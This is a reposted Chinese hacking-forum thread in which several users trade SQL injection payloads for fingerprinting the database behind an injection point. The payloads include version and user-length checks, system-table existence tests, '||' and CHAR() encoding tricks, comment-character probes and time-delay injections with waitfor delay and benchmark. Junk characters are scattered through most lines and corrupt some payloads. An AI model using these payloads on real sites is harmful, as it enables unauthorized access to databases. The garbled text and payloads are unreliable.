一个注射点如何最快速确认是什么类型数据库- O6 d( T1 b/ q( |
xsser (十根阳具有长短!!) | 2013-02-05 12:36
1 v \7 |5 Z/ ~, K8 I1 b# H假设这么一个注射点:
9 Z0 J6 I1 w1 E+ U0 V7 k8 v: d; Lshow.html?id=2
. v i% V; F, g! D3 B: @" Q1 _; @& |) O- xmysql:id=2 and version()>0, S. C G) F/ P: p3 v, W
oracle:id=2 and '1'||'1'='11
) K$ I8 ~# |1 Q6 R其他的欢迎补充
+ P0 Q. v: v: i: o0 N1#
; C( u/ j$ X8 W- T$ Y7 xupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47! l2 U8 `1 h9 O& z4 |5 }/ B; e) X
Access:* g* i& z, r( J) i$ s
aNd aSc(cHr(97))=97
1 I- \$ E* }. g4 Hand exists(select id from MSysAccessObjects)5 H, I' k& w) L$ U! L; D
SQL Server:
2 m. {7 J: g% a7 x ?3 Q6 Nand exists(select id from sysobjects)
6 Q- w* e& a( ~and length(user)>0
( W+ F3 ]' ?0 O: g. \MySQL:
9 x5 Y* M, \- a4 @$ V! V. Rand length(user())>03 Q, Q5 ~2 m/ {- L4 U
2#2 l7 P2 D) C9 {
xsser (十根阳具有长短!!) | 2013-02-05 12:48 ]; m& _( ]. a# t! r$ N# b
@upload 如果这些都不是呢…
8 E5 {: m' j: y3 r3#4 l" j& i/ I6 W* \, C" B# r' _ w
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:037 Z% m( \" h4 B# _2 H: f' Q
@xsser 不快速的,延时注入 K9 v1 @5 `4 d9 v, T& u
不知道这样写对不对: c& b* z* f, E+ ?+ s
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
* B0 J4 T# h+ m! ]" X5 Hmysql:id=2 and select benchmark(1e8,current_date());, g9 F! @/ w9 X& R( g' Z+ o2 _/ {
4#" H/ `/ F1 r* u: k$ ]
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
, l' i2 K/ a6 L+ A" K; b# N最快的貌似是看报错信息" N* }) E1 Z6 i( V
oracle error
+ l5 Z! C: _) ~* ?, A/ p& n: pmssql error: S- ~( K( ]8 C( _
mysql error( p1 I4 G6 q( | V- `: L% f
5#) Y3 `( J% d! F
Nimda (你们都是坏银~) | 2013-02-05 13:147 Q& _! w8 [- V0 r5 Q% |* f
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)( L+ V+ x8 c4 ^9 {
6#/ X5 d A2 I" |% A) i: c* \9 v
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:210 S( B8 H8 @1 c0 k2 V
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:. Z( [8 ^8 L- f L; S
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:; n: C1 B2 b$ Y
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。. |) b( i4 p, P* p. U
7#
" \5 V; U1 W7 d7 O' N- N1 Q- g' o_Evil (HackEnd) | 2013-02-05 13:33
) w4 P" ? r T. R# d9 i! w* rPostgreSQL
8 \* m5 r! O8 o- u4 S. y8#
) ^" @' |0 \3 [6 C; v# G; mupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
# G. w( U( G& z+ ]* m切换编码 and 1=1! n5 V0 E$ t! M; t( Z- f: q
oracle:
( \" p/ z1 K& \" x) }( wCHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49), ^5 T; p" H' z/ R7 R- _5 y
mssql:/ v: H, m, ]2 I- F, M a
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)6 ~* D& p: u4 Z. O/ u* F+ H
mysql:3 F, \! k4 [) D3 c3 n2 Q$ B
CHAR(97, 110, 100, 32, 49, 61, 49)
8 G% S7 f* P* x3 j/ b7 j( V* w2 h8 ~9#, q" Z& }, a7 d7 G
xsser (十根阳具有长短!!) | 2013-02-05 14:31& T2 @3 m. s% n: {4 F0 }$ e2 o
@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?! n4 b. Z0 \, P' X/ u; L4 E
10#5 ?$ y# \5 ~3 ?
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
$ X Z3 |; U/ w7 q9 [@xsser 是奇葩数据库类型的么?: ~. B j* t3 P3 h
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
- o, ]3 b! ?* ~; V) {7 R1 S1.是否可以使用特定的函数来判断,该数据库特有的
8 t) y% B0 t" `: H$ D1 a' w8 k2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等' C+ V' a! f' [" m
3.是否可以编码查询
- Z) W( ^+ Q0 |" Y; L$ z. z, e( P4.是否显可以利用错信息# O6 D8 V/ T3 K' J8 b# `" s' [
5.是否存在数据库某些特性辅助判断9 J) v- H6 d, G, _1 K9 ?
个人见解5 S! x; i1 n; A. e& z3 W- l9 m
11#
- o! w3 @7 g' H+ _, P- Q8 E) A小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55) `0 J6 Z* S- P
已收藏,mssql可以直接看到错误提示的吧~5 t" r" D1 r6 k1 a) n' y
12#
! Q; r; ~; N2 X' L, o% ?& e; ^7 SPasser_by | 2013-02-05 15:09
d' ~! _$ g8 K曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。. h: e5 g* q( |# K3 v; S6 w
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对